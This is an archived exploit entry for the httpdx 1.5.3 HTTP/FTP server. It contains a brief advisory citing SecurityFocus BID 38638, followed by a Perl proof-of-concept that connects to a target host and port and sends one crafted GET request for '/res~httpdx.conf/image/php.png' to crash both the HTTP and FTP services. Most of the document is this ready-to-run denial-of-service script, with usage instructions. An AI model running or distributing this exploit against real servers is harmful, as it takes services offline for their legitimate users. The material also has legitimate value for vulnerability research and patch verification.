|   1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63  |  source: https://www.securityfocus.com/bid/38638/info The 'httpdx' program is prone to a denial-of-service vulnerbaility. Remote attackers can exploit this issue to cause the server to stop responding, denying service to legitimate users. This issue affects httpdx 1.5.3; other versions may also be affected.  #!/usr/bin/perl # # Program: Httpdx v1.5.3 # PoC : Remote Break Services # Homepage : http://sourceforge.net/projects/httpdx/ # Found by : Jonathan Salwan # This Advisory: Jonathan Salwan # Contact: submit@shell-storm.org #  #  # //----- Application description #  # Single-process HTTP1.1/FTP server; no threads or processes started per connection, runs  # with only few threads. Includes directory listing, virtual hosting, basic auth., support  # for PHP, Perl, Python, SSI, etc. All settings in one config/script file.  #  #  # //----- Description of vulnerability #  # The vulnerability is caused due to an input validation error when processing HTTP requests. This can be  # exploited to break all services http & ftp.  #  #  #  # //----- Credits #  # http://www.shell-storm.org <submit@shell-storm.org> #  #  use IO::Socket; print "\n[x]Httpdx v1.5.3 - Remote Break Services\n";  if (@ARGV < 1)  {  print "[-] Usage: <file.pl> <host> <port>\n";  print "[-] Exemple: file.pl 127.0.0.1 80\n";  exit;  }  $ip = $ARGV[0];  $port = $ARGV[1]; $socket = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$ip", PeerPort => "$port") || die "[-] Connecting: Failed!\n";  print "[+] Sending request: GET /res~httpdx.conf/image/php.png HTTP/1.1\\r\\nHost: $ip\\r\\n\\r\\n";  $msg = "GET /res~httpdx.conf/image/php.png HTTP/1.1\r\nHost: $ip\r\n\r\n";  $socket->send($msg); print "\n[+] Done.\n\n"; close($socket);  |